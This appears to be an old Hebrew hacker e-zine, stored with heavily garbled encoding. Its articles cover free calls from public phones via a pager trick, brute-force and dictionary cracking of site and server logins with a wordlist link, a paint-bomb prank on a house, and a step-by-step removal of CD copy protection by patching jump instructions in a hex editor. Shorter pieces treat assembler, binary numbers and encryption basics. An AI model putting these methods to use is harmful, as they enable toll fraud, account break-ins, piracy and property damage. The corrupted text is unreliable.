5קודב םיקחשמ6 היקונ םיאבה םיגוסהמ ןופאלפ
" הלאה םיגוסה לע יתקדב ינא דועו " גנוסמס
:הלועפה
"" תאז םישוע קוידב #יא דמלנ וישכע זא
לש תימופל ןופאלפה לש תקסרפה תא םידימצמו 5יתקדב הז לע קר6 ירוביצ ןופלטל םיכלוה
" ףסכ םכל הלעי הז יכ גייחל אל לבא " ןופאלפב רפסמה תא גייחל םיליחתמו " ירוביצה ןופלטה
רפסמה תא %וחלל טושפ זא
אוה ילש רבח לש רפסמה $ אמגוד הפיאמ6 תקסרפבה תא דימצמ ינא הככ זא " בוט דיגנ
רפסמה תא גייחל ליחתמ ינאו " ירוביצה ןופלטב םירבדמש הפיאל "" ילש ןופאלפה לש 5םיעמושש
ולש %חול אלו send
תא העמוש ירוביצ ןופלטהו רפסמה תא םשור ינאש עגרב לבא " ףסכ הלעי הז זא יכ ןפוא םושב
לוכי התא גייחמ הז םהילע דבוע אל הזש " םירוביצ םינופלט שי " גייחל ליחתמ אוהו " םירפסמה
הלימ דיגהל 5וילע םישרוח6 םילצנמ זא """ ישפוח הזש םינופלט שי לבא קתנמ הזו תוינש
ןכש םג שי לבא םידבוע אל םבור " ןופלט יתאצמ קוחר רתוי לבא הזכ ןופלט ןיא ילש תיבה דיל
""" ונהית זא " הווש הזו
By Milki ¡I.C.F]
הפסוה...
)...דועו רפס תיבב ! םילוח יתבב ! תונחב שיש הלאכ ( . תועבטמ םע םינופלט לע םג תדבוע הטישה
גייחמ הזו םירפסמ םיצחול ןופאלפה תא םידימצמ רבד ותוא םישוע %
By Old-Hacker¡I.C.F]
+*9
ילורב חוכ
%6ld!Hacker ינא הז . םלוכל םולש
( תואמסיס %ירהל םתמלח דימת *+*++* ילטורב חוכ הזש המ קוידב הזו ) םיטרסב ומכ %
דועו קרימ ! ויק יס יא ! םילייאמ יא ! םירתא $ טנרטניאב םוקמ לכל %ורפל רשפא ילטורב חוכ םע
לכה טושפ( ...%%%Y%
ףוריצ יע םיוסמ רבד לש אמסיסה תא תולגל הסנמ רשא הטיש ונייה י לטורב חוכ - הככ זא בוט
םינשנו םירזוח - םיבר תונויסינ -תויתוא ) םיירפסמ המכ לש %
םתס ( זזז ול םיארוקש רתא לש%%%Y-#P ל %ורפל הצור ינא םא $ לשמל
תבותכה זא h
QtI%(((%co4
h בורל היהי user na4e הו
Root in uni'<linu' 3erVer
"d4in or ad4inistrator in N#<9/ 3erVer
שפחל ילטורב חוכ תנכותל ונת אמסיסה תאו %%%
רשפאש Brute -orceiאיה ילטורב חוכל בהוא יכה ינאש הנכותה
ילש רתאב תודרוהה ףגאב התוא דירוהל%
שופיח לש תויורשפא יתש שי הנכותל בוט h
8ord list
Brute -orce
p8ord list הז המ
בשח ילוא רתאה להנמש םילימ לש בר רפסמ םע %בוק הזש םינולימ תרזעב הצירפ ןויסינ הז
אמסיסכ םהילע %%%
לש %בוק לשמל טנרטניאב ןומה הלאכ גישהל רשפא 9* ל חתפנש הגמ .* ינא ( םילימ לש קר הגמ
בוט יכה ... וב קר שמתשמ Y%
httIh//hackersclub%co4/k4/Qiles/IasswordPcracker/wordlists/hhPdictall%(iI
Burte -orce הז המ
ב ליחמ הז ... תואמסיס %ירהל ליחתהל בשחמל תרמואש היצקנופ יהוז
"a
"b
"cz
אמסיסה תא אצומ הזש דע #ישממ הז הככו %
iינאש ללגב םגו(.. רתויב תוצופנה םילימה תא םש שיש םושמ םינולימב שמתשהל %ילממ ינא
הזב שמתשמ%%%Y%
By Old-Hacker ¡I.C.F]
+*3
עבצ תצצפ
םיכרצמ h
עבצ רתוי אציש ידכ םימ םע ללדלו( ... םירבח המכ םע ריחמב קלחתהל %למומ - הברהו עבצ Y
רוחש %למומ( ןשי שובלY
תואצמתה שוח
םירבח %למומ
שבי חרק
ןגראלו דחא םוי אובל = )שיש לוז יכה תא ונקית ( עבצ םינוקו ףסכ המכ איבמ דחא לכש םירבח
ותוא םיברקמ חפב עבצה תא םימשו םיאב תרחמל רקבב . עבצה םע םיבברעמו םימ םיחקול
שי זאו רהמ םשמ םיחרובו הצצפ םיקעוצ זאו 9 םינפב שביה חרקה תא םימשו רמושל
...שאלפס
By cool-guy && blackdeath && Old-Hacker
+*:
ל ךירדמה Cracker /, ליחתמה Zeos
---------------------------
$םיניינע ןכות
&&&&&&&&&&&&&
אובמ.א
חוציפ הז המ.ב
חוציפה תורטמ.ג
תויקוח.ד
שרדנ עדי.ה
הבוח עדי.ו
חצפמל םיצופנ םילכ.ז
םילכה תדרוה.ח
תודות.ט
אובמ .א
&&&&&&&
םירבד וכותב ללוכש הזה #ירדמה תא יתבתכ רתוי םיבכרומה םיכירדמה םע #ישמי ינאש ינפל
הצורש ימ לכש
.גישהל הפיאמו גישהל #ירצש תונוש תונכות םגו תעדל #ירצ חצפמ תויהל
5תבשח םא רחא והשמ וא טנרטניא ירתא אלו תונכות חוציפ אוה רבודמש חוציפה גוס $הרעה6
חוציפ הז המ .ב
&&&&&&&&&&&&&&
לכל םתוא בתנלו )ילש םיכירדמב כדב תונכותל הנווכה( הנגה תוכרעמ לע תולעתהל הז חצפל
#רוצ
.הצור התאש ומכ לעפיש #כ בשחמב רבד לכ תונשל וא .הצור התאש
חוציפה תורטמ .ג
&&&&&&&&&&&&&&&
- ל תלבגומ הנכותה ! לבא הנכות תדרוהו דיגנ 3* הרוקש רבד( התוא הנקתש וא .השעת המ ! םוי
תויהל #ופהת איהש השעת רמולכ .התוא חצפת חצפמה לש הרקמבש וא )דואמ תורידנ םיתיעל
ל תלבגומ :*
היהת אל איהש הככ התוא קתשת וליפא ללכבש וא #כ לכ יביטקפא אלש רבד !הזכ והשמ וא םוי
תלבגומ
)$ """"הע הע הע הע הע העומ( הנגהה ןונגנמ תא הל לסחל - רוציקב !םימי םושל
%בוק תדרוהו דיגנ איה חוציפ םע תושעל רשפא המל אמגוד דוע 1,P #ל ןיאש הלגמ התא לבא
אמסיס
%בוקל קר אלו .הנוכנה המסיסה תא ומצע %בוקהמ לבקל לכות ולש הנגהה תא חצפת םא !וילא
1,P אלא
מ תואמסיס לש םירחא םיגוס אלמל םג 86R$ )$ ןוגטנפה לש אמסיסל דעו
ןיכהל איה חוציפ םע תושעל רשפאש )בר םוכחת שרוד אל אוהש תורמל( יתעדל דמחנ יכה רבדה
םירניירט #rainers המ .םיקחשמל
רניירטה תא ליעפמ התא .םידוק ליעפהל חוכ #ל ןיאו והשלכ קחשמב קחשמ התא דיגנ . רמוא הז
תאזש
יכ ןייצל בושח יכו םירניירט םינוב םיחצפמ הברה .#ליבשב םידוק ןייעמ הליעפמ םצעבש הנכות
ימ
תמגודכ תורחא תופשב תנכתל תעדל בייח םירניירט תנכתל הצורש 0B -- וא & שמתשהל וא
. )%למומ תוחפ( םירניירט רצויב
+*=
ומד הזיא תלביק דיגנ $e4o םצעב םה םיאומדה תיברמב .היהי אלש המ וא םיקחשמ ןיזגממ
#ירצ התאש המ לכו "םיאלמ םיקחשמ
. אלמ קחשמ #ל שי "הלאוו-ו חוציפ תרזעב םהלש תורדגהה םע קחשל תצק הז
#לש רבח לש בשחמל אב התאש דיגנ איה חוציפ םע תושעל רשפאש המל הנורחא המגוד !ייקוא
הצורו
יתלוכי קר םא - #מצעל בשוח התא זא ! )אמסיס לכ טעמכ( 0000 הילע שיש המסיס לכ איצוהל
תוארל
תויבכוכה #ותמ תולקב אמסיסה תא ףולשל לכות חוציפ תועצמאב 0000 ה ירוחאמ שי המ
...רתוי וליפאו
...ןורקיעה תא תספתש ןימאמ ינא לבא תואמגוד תואמ עברא םיפלא תנומש דוע #ל תתל לוכי ינא
תויקוח .ד
&&&&&&&&&
ןוכיסה תא #מצע לע חקול התא םא לבא ! 'וכו םירצוי תויוכז לע רבוע התא יכ .יקוח וניא חוציפ
#ניינע אוה #לש בשחמב השוע התאש המ לכש ןימאמ ינא .הבבס זא )רידנ דואמ( #תוא וספתיש
דוע לכו דבלב
$ ...הזכ אל קוחה לבא !יקוח ידל בשחנ אוה ותוא קוושת וא ותוא רוכמת אל * )
שרדנ עדי .ה
&&&&&&&&&&&
והשמ דמלתש ףידע ילוא בשחמב קחשלו טנרטניאב טט'צל הנהנ התא םא .חצפל לוכי דחא לכ אל
.רחא
ינא ! )תונכת תפשל הנווכה( איהשלכ הקימתירוגלאב עדי ול היהיש בייח חצפמ תויהל הצורש ימ
ןווכתמ אל
ומכ דואמ תיסיסב תונכת תפשל gB"3,& תמגודכ תומדקתמ רתויה תופשהמ אלא 0B -- וא &
אלפתת לקספ וליפא
.חוציפה תא םיחנמש תונכתה תודוסיב ןוכנ רתוי וא חוציפה תודוסיב #ל רוזעל הלוכי אל וא
המ לכו תויצקנופ !יאנת !תואלולב רושקש המ לכ לע רבדמ ינא הקימתירוגלא לע רבדמ ינאשכ
.הכותב תללוכ תבשחוממ הקיגולש
"הבוח עדי .ו
&&&&&&&&&&&&
ילבמסא הפשה תא דומלל ליחתהל תופש המכב וא תמיוסמ הפשב עדי #ל שיש ירחא %ילממ ינא
רוציקב וא רלבמסא םג תיארקנש( "3M )
.חוציפל סיסבה איהש
רצוי התאש תוינכותה תא הריממ איהש ינפמ רמול ןתינ תופשה לכל סיסבה איה ילבמסא הפשה
#ל רוזעיש רבד בשחמה לא רישי ןפואב טעמכ
רתאב אוצמל ןתינ רלבמסא לע #ירדמ( .תונוש תוינכות תלועפ חתנל ,H& )
חצפמל םיצופנ םילכ .ז
&&&&&&&&&&&&&&&&&&&&
$)שמתשמ בורל ינאש( םיאבה םילכהמ דחאב לקתת חצפמ #תויהב !ייקוא
0 839 התא התוא תינכותה דוק תא תוארל #ל ןתונש ילכ אוה ראלבמסיד - רלבמאסיד לש גוס -
רלבמאסידב םישמתשמ .ילבמסא תפשב חתנמ
839 לש הז תמגודכ םירחא םירלבמאסיד יכ ןימאמ ינא יכ םא כדב B6R7"N$ םילוכי םג
.םיבוט תויהל
+*J
0 Hworks םשב םג ארקנ - H8 םיילמיצדסקה םיסיסבב %בוק לש ןכותה תא גיצמ הז ילכ !
יסיסב( +J סיסבה לע םיטרפ דועל ! )
ב אצמנש ילמיצדסקה סיסב לע ילש #ירדמה תא ארק ילמיצדסקהה ,H& םוקמ לכמ ארק וא
בוט ילמיצדסקה #רוע דועל אמגוד .רחא
מ %וח Hworks אוה "K .
0 3oQt,& ותוא %בוקה לש היח הגוצת #ל ןתונ - הארנכ םלוכ ןיבמ קזחה ! רגאבידה הז ילכ -
#ל ןתונ אוה רמולכ ! ילבמסאב חתנמ התא
הריצע תודוקנ תנזה יעו !םש הרוק המ תינכותה לש הציר ידכ #ות קודבל BPK ןתינ תינכותל
ורזעיש תוינויח תורגיש תוארל
.תינכותהמ הצור התאש המ תא איצוהל #ל
ב שמתשמ אל תישיא ינא 36-# ,& הב םישמתשמ םיחצפמה בור לבא ! תויעב יל השוע איה יכ
רובעי ינא םג ילואו
םירגאבידב םג שמתשהל לכות הזה רגאבידהמ %וח . )...וב יתשמתשה םעפ( הרזחב הזה רגאבידל
תמגודכ P&!8"#&H וא #R8 םיבשחנש
...םיבר הברה דועל ןכו םיניוצמ םירגאבידל
םיקחשמ חצפמ0 Ga4e &racker קחשממ איצוהל #ל ןתונ הז ילכ ! םיחצפמל תוחפ רכומ -
!תובושח םיכרע תודוקנ םיוסמ בשחמ
תיינבב רזוע אוה 'וכו תוירי !םייח תודוקנ $ תאמגודכ #R",NR3 עדימה לכ תא חצפמל ןתונו
.קחשמה ינותנ יבגל
ה דחא #ותב )ילש תוחפל( אצמנ םיקחשמ חצפמ #R",NR3 #ירדמ בותכאש עגרב ..יתדרוהש
םג בותכא )קנע #ירדמ( םירניירט לע
.ותיא תושעל ןתינ המו םיקחשמה חצפמ תא אוצמל הפיא
- םי'צטאפ רצוי0 Patch &reator לש הנגהה תא הנשמש %בוק( קארק רוציל ידכ םישמתשמ הזב -
םא . )תמיוסמ הנכות
שי יכ םא !החונ רתוי איה יכ תאזה הנכותה תא #ירצ התא #מצע לשמ קארק רוציל #נוצרב
.םי'צטאפ רצוי םוש אלל םינובש םיחצפמ
םילכה תדרוה .ח
&&&&&&&&&&&&&&
םילכה תא אוצמל ןתינ וישכעל ןוכנ .הלאה םילכה תא םישי ומצע תא דבכמש גניקארק רתא לכ
רתאב ,H& ! www%ihc!net%org
ושיקתו שופיח עונמל וכל טושפש וא &racking .
$ הלאה םירתאהמ דחאב רתויו תונכותה בור תא דירוהל םג רשפא httIh//hackersclub%co4 וא
www%crackstore%co4
By Zeos
+*N
חצפמל רלבמסא
-------------
תויסיסב תודוקפ אצמת #ירדמב חוציפ אשונב ילש ןושארה #ירדמה והז םלוכל םולש
חצפל הסנמ התאש הנכותב הרוק המ ןיבהל #ל ורזעיש רלבמסאב
&"77
----
תבותכל האירק $שמשמ
תבותכה תבותכב היצקנופל ארוק $הלועפ
$ אמגוד &"77 +*9.:3+9
האבה הרושל #ישמת תינכותה היצקנופל האירקה ירחא
&MP
---
לאריסל ונסנכה ונחנאש לאירסה ןיב האוושה לשמל תינכותב יהשלכ האוושה $הלועפ
המושר תינכותה םא הקידב !תינכותה לש
$ אמגוד &MP "K,*3h

האוושהה ירחא יהשלכ הציפק אצמת ללכ #רדב
fMP
---
ל המוד יד תאזה הדוקפה $הלועפ goto תינכותב והשלכ םוקמל תצפוק איה
$ אמגוד fMP **:*9*++
$אמגודל תוציפק לש םיגוס המכ שי
ee ןוכנ הווש #רעה םא הציפק -
ene ןוכנ אל הווש #רעה םא הציפק -
( האוושה ללכ #רדב האב הציפקה c4I $אמגודל )
&MP Real3erial,Bad3erial ונלש לאריסל יתימאה לאריסה ןיב האוושה $
fN Go"wa)Bad&racker הווש אל ונלש לאריסה םא הציפק $
M60
---
דעיל רוקמהמ הלימ לש #רע תקתעה $הלועפ
$ אמגוד M60 "K,$K
המשה תלועפכ שמשמ הז ללכ #רדב תינכותב ןומה תאזה הדוקפה תא הארת התא
R#
---
היצקנופמ הרזח $הלועפ
$ אמגוד R#
+*.
האירקל הרזחכ תשמשמ איה !היצקנופ ףוסב תאזה הדוקפה תא הארת התא ללכ #רדב
.םכל רזעש הווקמ םייתנבל והז
$ידי לע בתכנ #ירדמה VbMan
ל תולאש וא תובוגת יל וחלש elidor.Jkhot4ail%co%il
+*;
.ךפההו םיינורשעל םיראניב םירפסמ ךופהל ךיא
: יראניב
.ןיבמ בשחמהש הנוכמ תפש איה יראניב
םירפסמה םה יראניב לש םוחתה *,+ .
תוליגר תויתוא !םירפסמ יראניבמ השוע ינא #יא זא םכמצעל םירמוא חטב םתא
.רחואמ רתוי תויתוא לע בותכא ינא הזה #ירדמב םירפסמ לע זא
.רחא #ירדמב
.ינורשעל יראניבמ #פוה ינא #יא
$אמגודו רבסה
רפסמה תא חקינ **++**++ רפסמה תא למסמ אוה ריהמ בושיחב ! =+ .
.הז תא יתישע #יא יקוא
.םיבשחמב ' יראניבה לש הלבטה איה הנה
+9. J: 39 +J . : 9 +
.תחתמ יראניבה תא סינכנ
* * + + * * + +
תיתימאה הרפסל תחתמ שי םא וישכע * הווש אוה זא דחא שי םא לבא ספא הווש רפסמה זא
ה לעמ בותכש המכ + .
$לשמל
םירכוז זא דחאה לעמ דחא שי + ה לעמ דחא שי ! 9 דוע םירכוז ! 9 !
$ל םיעיגמש דע 'וכו +s9s+Js39 & =+ .
$םייתש וא םיליגרת הפ םכל ןתא ינא . רורב
++**++** . &
******+* . &
תאצל רומא ןושארב 9*: .
תאצל רומא ינשב 9 .
.השק שממ אל הז יכ בוש וארקת אל םא םתנבהש הווקמ ינא
.לק לש הרדגהל סנכנ ןיידע לבא #בוסמ רתוי תצק הז .יראניבל ינורשעמ םיכפוה #יא וישכע
רפסמה תא לקינ +:3 . םישוע המ זאו
+9. J: 39 +J . : 9 +
!ןימיל לאמשמ !ליחתנ אוב הללאי
םאה +:3 לש הביתב סנכנ +9. מ לודג אוה םא ! +9. .דחא םש םושרנ זא !ןכש רמוא הז
ונל ראשנ וישכע += ( +:3!+9. .)
!#ישמנ += ב סנכנ J: םאה !ספא םש בותכנ .אל ! += ב סנכנ 39 .ספא םש ריאשנ !אל םג !
+= ' ב סנכנ אל +J םש םג בותכנ זא ! * .
+= ב סנכנ . ונל ראשנו דחא םש בותכנ זא ןכ ! N ( +=!. . )
N ב סנכנ : ונל ראשנו דחא בותכנ ןכ ! 3 ( N!: )
3 ( דחא ונל ראשנו דחא םש בותכנ ןכ !םייתש ב סנכנ 3!9 .)
בותכנ םש םג זא ףוסב דחאל לוב םיאתמ אוהו דחא ראשנ וישכעו + .
. ונל אצי יראניב הזיא
+***++++
היינשה םעפב חומל סנכנ הז יכ !בוש וארקת זא אל םא לבא הווקמ שממ ינא !םתנבה
+9. J: 39 +J . : 9 +
+ * * * + + + +
.)הלקה #רדה הזש( ןובשחמ ילבו ריינ ףד ילב הז תא ושעתש דע הז תא ולגרתת וישכע זא יקוא
By Zeos & Pirs¡I]ng
++*
תונגה חוציפ CD הסרג , 1.1
:תאמ Zeos
תוליעפ לכ וא)ו #בשחמל םרגיש קזנ לכ !דבלב דומיל יכרוצל הזה #ירדמה תא יתבתכ $המדקה
#רד יע חוציפהמ ףסכ קיפהל הצור התא םא .דבלב #תוירחא לע םנה השעתש תיקוח יתלב
"אורקל קספה אנא יהשלכ
' הנהמ האירק Zeos
.הילע םידבוע ונחנאש הטישה המ זא ! ייקוא
חצפל ליבשב CD ה לש הנגהה תא ןוכנ רתוי וא ! CD ןוגכ תולועפ םהשלכ תושעל #ממ תענומש
לכ תא תלרטנמ םצעבש תיסיסב דואמ הטישב שמתשנ ונחנא רחא רבד לכ וא יוניש ! הקתעה
הלק דואמ םג ןכלו תיסיסב דואמ הטישה .קסידה לש ותויקוח תא םיקדובש האוושהה תולועפ
תא םינובש םיתנכתמה ןמ םיבר אל ןכש תובר םיתיעל דואמ הבוט איה #א תיעוצקמ #כ לכ אלו
)$ #כמ םינהנ םיחצפמה ונחנאו םתחטבאב םיניינעתמ םיקסידה יצבק תא הבג : דואמ בושח
.סרהל םורגל לוכי ןוכנ אל שומיש * םתא הלועפ לכ השעתש ינפל קחשמה
$עדיו םילכ
יתחלצהו יתטלקש דע םיבוט םישדוח המכ ומכ והשמ חקל יל ! ($ חצפל לוכי דחא לכ אל !השעמל
יוות ! םיסיסב $ םיבשחמה םוחתב דואמ יללכ תויהל #ירצ #רטצתש עדיה ...תינוניב המרב חצפל
הפשל תבשחנ ילבמסא ןכש ילבמסא תצק דמלתש ףידע הזמ %וח ...תמדקתמ הקימתירוגלא יקסא
תא #ל שי םא .תופשה לכ לש אמאל תבשחנ איה ןכש ! ףס תפש םג ותוא םינכמו דואמ ההובג
...םיישק לכב לקתת אל םיאתמה עדיה
$ חוציפל םירבד ינשב יתשמתשה הז #ירדמב
1 ידכ ילבמסא תפשל הנוכמ תפשמ רודיה ירחא %בוק #פוה ' רלבמסאמ #ופה השוע( רלבמאסיד.
)הרוק המ ןיבנש
2 ילמיצדסקה #רוע . Hworks .
.םתוא גישהל היעב אל שממ..תשרה יבחרב גישהל ןתינ הלא ינש תא
בלש 1 .קסידה תעדוה תקידב $
קחשמה תא %רה ! ייקוא אלל תעדוהל בל םיש לבא ! )להבת לא( דובעי אל קחשמה ! קסידה
רחאל התוא רוכזו התוא #ל םושר . קסידה אלל %בוקה תא ליעפמ התא רשאכ תצפוקש האיגשה
.חצפמל דואמ תינויח איה לבא הבושח איהש בשוח אל התאש תויהל לוכי .ןכמ
בלש 2 .תינושאר תולכתסהל !בוקה תא םיחתופ :
רלבמאסידל רובענ העדוהה תא ונמצעל ונמשרש ירחא ! ייקוא W32 ה %בוק תא חתפנו EXE
)$ הפל רוזחו והשמ התש ! ןמז המכ תחקול תאז הלועפ !הלחתהב ונלעפהש
וילע בותכש הלעמל רותפכה לע %חל ' הדובעל המידק ' ולש תולועפה תא תושעל רמג הז ! ייקוא
Strn.REF הזב שמתשהל דמלת( המ לכ השוע המ ןיבנש ידכ תינכותה יטפשמ תא ונל שרפמש
ינימ לכ םיאור ונחנא וישכע הנה וא . הספדהה רותפכל דומצ אצמנ רותפכה )...חצפמכ הברה דוע
תעדוה תא אצמנ אוב וישכע ' ילבמסאב תינכותה דוק לכמ האצותכ ורצונש תינכות יטפשמ
קינזי רלבמסאידהו םיימעפ טפשמה לע %חל ! םשש םיטפשמה לכ ןיבמ םדוקממ ונמשרש האיגשה
ימל השק תצק קלח עיגמ וישכע . טפשמה לע הנוממה הרודצורפה תאצמנ ובש םוקמל #תוא
ימרוג לכ תא לרטנל הז ונלש הרטמה הלעמל רבסוהש יפכ $לק היהי ילבמסאב תצק ןיבמש
אוצמל םיכירצ ונחנא זא .קסידה לש תויקוחה תקידב תא לרטני םהמ דחאש הווקתב האוושהה
' היצקנופל האירק לע םירומש םיטפשמה םתוא תא .טפשמה לש םיטפשמה לכ ןיב CALL !
' הציפק JMP הווש רשאכ הציפק וא JNE ' הציפק גוס דוע ףאו ' JE הדוקפ לכ רוציקב.
הרושה - האירק !הציפק טפשמ לע רבוע התא רשאכש בל םיש . הציפק וא ! האירק לע הארמה
עבצב ןמוסת קורי הארתו הטמל לכתסת דבלב העדוהה לש הרגישה #ותב תאזכש הרוש לכ וישכע !
בותכש הארת ' טפשמה לע םינותנ Offset xxxx רשאכ ? XXXX ונחנאש רפסמה אוה
ה אלל ' םיכירצ H תכפוה הרושהש אדוול חכשת לא ' תורושב תאצמש הזכ רפסמ לכ בותכ .
עבצב תויהל קורי .לרטנל םיכירצ ונא ןתוא תודוקפה תא שיש יתמ
+++
בלש 3 הנגהה לורנ :
#ותמ אצ !לק יד רבכ הז הפמ ייקוא W32 ילמיצדסקה #רועל #לו HW %בוקה תא חתפ ! ונלש
שקהו F! הזש "O#O #רועב ולש םוקמל #תוא קינזי #רועהו ןושארה רפסמה תא םושר '
אוה ונמשרש רפסמהו דיגנ $ ןטק והשמ דמלתו אוב הזה בלשב ! ילמיצדסקהה $$$3E%2A הז
ונל שי יכ רמוא & לכ ' טייב 2 סיסב הז ילמיצדסקה( דחא טייב םה םירפסמ 1' הז טייב וליאו
סיסב ( $#כ תוארהל רומא םצעב רפסמהש הככ )
$$)$3 - E%)2A $ רמולכ ( & םירפסמ & ירחא ...#ישמנו אוב הז תא תספתש ירחא ! ייקוא .טייב
רפסמה תא םירפסמ גוז לכ םוקמב בותכ ' #לש רפסמב םיטייבה רפסמ תא תנבהש *$ $ רמולכ
$$)$3 - E%)2A + *$)*$)*$)*$ תא רומשו םלוכל רבד ותוא השע םירפסמ דוע #ל שי םא !
קחשו #מצע תא רפ'צ ' קסידה לש הנגהה תא תצרפ ' ןוכנ לכה תישע םאו בוט לזמב . %בוקה
)$ ...רקובה דע קחשמב
בלש & תונקסמו תורעה $
תצירפ איה תאז #ירדמב ונישע ונחנאש חוציפה .חוציפ לע תצק בישקתו אוב הפ רבכ התא םא
תוארל רשפאו %ופנ דואמ אוה הזה חוציפה ןונגס . תולקה תחאל תבשחנש הצירפה תאזש הנגה
תא ביצעמ ידש המ ףסכ דואמ טעמב בורצ קסיד תונקל רשפא טעמכ םוקמ לכבש ןוויכמ תאז
קחשמהש ללגב קר רקי ריחמ םלשל םיצלאנש םינכרצה ונתוא םג ביצעמ #א םייקוחה םירצויה
ביבחה תואמסיסה חוציפ אוה חוציפ לש ףסונ גוס דוע .חוציפבש תורטמה תא םג תאז ןכלו יקוח
לש םתירוגלאה תא איצוהל הסנמו אמסיס תלבגמ םע הנכות חצפמה חקול הזה חוציפב .יילע
השק םג תויהל הלוכיו הלק תויהל הלוכי ... םימיוסמ םינותנל הנוכנה אמסיסה תא וא אמסיסה
.תירשפא יתלב טעמכו השק םג םיתיעלו דואמ
' #ירדמהמ םתינהנש הווקמ ZEOS תרשב כדב אצמנ( ,-r,t..o.,/ ) תירבע3 וא החטבא3 רדח
הלימה תא שפח קמועל רתוי תצק סנכיהל הצורו חוציפב ןיינעתמ התא םא CRAC0 יעונמב
.םינושה שופיחה
ישנאל הבר הדות HACKER.CO.IL )$ חוציפל יתוא ופחדש
By Zeos
++9
הנפצהו דודיק
$םיניינע ןכות
. הנפצה הז המ 0
".". ןיפצמ ינא #יא 0
. בוט הז המל 0
. הז תא ולגי אלש חוטב 0
. םיקניל 0
.םיטידרק 0
&&&&&&&&&&&&&
. הנפצה הז המ
&&&&&&&&&&&&&
.רורב אל !העווז שממ הארנ הזש !רחא והשמל תבתכ התאש המ הנשמ םצעב התא הנפצה #ילהתב
וארקי אל )םירטוש( םישרומ אל םישנאש ידכ הנתשה הז קר םש אצמנ תבתכש המ לכ םצעב לבא
.הז תא
הנכותה !לשמל .רחא הנפצה גוס שי הנפצה לש םתירוגלא לכל " .הניפצמ איה #יא
$רחא והשמ היהת הלש הפב תוא לכש העבק איה
" הלש הפשב היהת 3 !
B הלש הפשב היהת J !
& הלש הפשב היהת ; !
$ הלש הפשב היהת +9 .
בותכת איה #יא זא "B&$ $ הככ הז תא בותכת איה . 3J;+9 .
.סיסבה םצעב הז לבא הככ תויהל בייח אל הז
.םירזומ םיוות יע ןכותה תרסתה !ןכותה יוניש !אלמ יוניש אל לבא רוקמה יוניש אוה הנפצה
!הזהמ עדית אל התאש רבד הארת התא רחא וא הזכ ןפצומ %בוק חתפת התא רשאכ
.ןוכנ אל הז לבא שובריח םתס !סורה !רומג אל %בוק הזש ילוא בושחת התא
...ונממ םתנבה המ יל ודיגת !ןפצומ היה אוהו תשרב יתיארש טסקט הז $ אמגוד
-------------------------------------------------------
/"3-6N" 3-/N"3- 3$,-Hk8mxX&kmxf#/ 8$RGP 03M0 3$P6G V+9 .
-------------------------------------------------------
. םינפב שי המ תעדל םיצור !הז תא יתחציפו הנפצהה גוס תא יתאצמ וישכע
-------------------------------------------------------
decr)It !j /"3-6N" 3-/N"3- 3$,-Hk8mxX&kmxf#/ 8$RGP 03M0
3$P6G V+9 .
undecr)It !j ,ts a Ver) si4Ile Irogra4 to decr)It, i think u can do it .
-------------------------------------------------------
. הזמ םתנבה המ ונ
.וב שמתשמ התאשכ קר לבא !דמחנ רבד הז הנפצה 0
.םיבוט םילכ #ירצ קר הנפצה חנעפל השק אל 0
.#ישמנ ואובו יללכה תא הפ םתנבהש הווקמ ינא

&&&&&&&&&&&&&&&&&&
".". ןיפצמ ינא #יא
&&&&&&&&&&&&&&&&&&
....ןיפצהל תוירקיע םה יתעדלש םיכרד יתש שי יקוא
+ .)התוא תבתכ התאש יאנתב( עבוק התאש #יא ינפל לכה תא הניפצמש הנכות בותכל .
9 .אמסיס םע הז תא תושוע תונכותה בור ועדתש קר !בתכ רבכ והשימ רשא הנכותב שמתשהל .
.הנפצהה תא חתפי הזש ידכ הנוכנה אמסיסה תא בותכל #ירצ התא
++3
$םירבסה
+ . תויהל הכירצ איה #יא !הניפצמש הנכות םיבתוכ םתא םא .
$םיאבה םיותתה תא רתאמ אוה הפיא קודביש בשחמל ריזגמ התא
"B&$-GH,f/7MN6PgR3#M08KL1abcdeQghiekl4noIOrstuVw')(*+93:=JN.; !
.02*>=3?"--.
ש ועבקת לשמל !םיעבוק םתאש המב םתוא ףילחמ אוה דואמ טושפ זאו " היהי 1 תא השעי אוה
.הז
$#פיהה םישוע זא יתישע םתאש הנפצה תחתופש הנכות בותכל םיצור םת םא 22
םיותתה תא תונשל ול תתנש הלאה םיותתה תא רתאמ אוה הפיא קודביש בשחמל ריזגמ התא
.םיליגרה
ש תרמא לשמל " הז 1 הארי אוהשכש רמוא התא זא ! 1 הז תא הנשי אוה " .
9 לע םיצחולו והשלכ טסקט %בוק םיחתופ םתא !טנרטניאב הנכות םישפחמ םתא . decr)It !
ןכל איצוי אוה ןכמ רחאל !םירשאמו םישיקמ םתא !םיעבוק םתש אמסיס םכמ שקבמ אוה
.יתימא שוקשק
לע םיצחול םתא הז תא חותפל םיצור התא םעו undecr)It .אמסיס שקבמ אוה !
.התוא םתלכא אל םא !יפוי הנוכנה תא םישיקמ םתא םא
אל םתא םא !וסנתו הנפצהו דודיק תנכות ונבת וא ודירות !דבל הז תא קודבל וצרת םא יקוא
.)&< יל םינימאמ
&&&&&&&&&&&&
. בוט הז המל
&&&&&&&&&&&&
.םדא ינבה לכ לש תויטרפה תא למסמ םצעב הז יכ !םירבד הברהל בוט משמ הז
ה לע ילש הבתכה תא םתארק חוטב -B, .הז תא %פנמ םצעב הז זא ןוגראה לש רתאב תותיצהו
השוע תשלובה !םתישעש םיבוט אלה םירבדה לכ לע ! ידוס שממ ידוס טסקט םכל שי לשמל
!הטישפ
אלו תקפדנ אל םולכ הרק אל ....ותוא חצפל החילצמ אלו ! %בוקה תאצומ בשחמה תא האיצומ
.םולכ
תשלובב ןצלפ הזיאש יוכיס שי הבותכ רבכש הנכות םא ודבעת םאש ...הנטק היעב הפ שי לבא
התוא הלגי
. %ייעמ ינא המ זא .התוא םצלכא זא תויעב ילב %בוקה תא חתפיו
.עדי אל דחא ףאש )הבוט הניחבמ( רשפאש יארונ יכה דודיקה תא םש םישל !דבל הנכות בותכל
.המ הז המ עדיתש םיוות תפמ ןימ ומכ והשפיא #ל היהיש
!הנכותה תא קוחמל %עיימ ינא )רצעמ וצ ! קית #ל שי( הנכסב התאו הנכות ןיכמ התאש ירחא
.קפדיהל יוכיס לידגמ התא יכ התוא %יפת לאו %בוקה תא חותפל #יא םהל היהי אלש ידכ
.הנפצהה תא חתפתש !יטנא הנכות בותכל #יא ירחא ועדיתש םיוות תפמ והשפיא ועקת
$םירבד דועל בוט הז
+ .רחא והשימ לע וא םכילע ידוס עדימ ריתסהל .
9 . ))$ דומח הזיא( ותוא הל חלשתש דע ותוא ואריש םיצור אל םתאו הדליל הבהא בתכמ םתבתכ .
